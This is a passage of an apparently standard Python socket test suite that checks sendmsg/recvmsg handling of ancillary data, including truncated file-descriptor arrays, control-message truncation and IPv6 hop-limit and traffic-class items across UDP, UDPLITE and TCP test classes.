self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
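    # Hedged illustration of the ancillary items these tests expect to
    # receive once the corresponding IPV6_RECV* options are enabled:
    #
    #   (socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT, <SIZEOF_INT-byte native int>)
    #   (socket.IPPROTO_IPV6, socket.IPV6_TCLASS,   <SIZEOF_INT-byte native int>)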
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecondCmsgTruncInData.client_skip
def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
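# Each concrete class combines reusable test-method mixins (RecvmsgTests,
# SendmsgConnectionlessTests, RFC3542AncillaryTest, ...) with a
# transport-specific base; @requireAttrs, @requireSocket and
# @unittest.skipUnless skip an entire class when the platform lacks the
# needed API, constant or address family.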
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
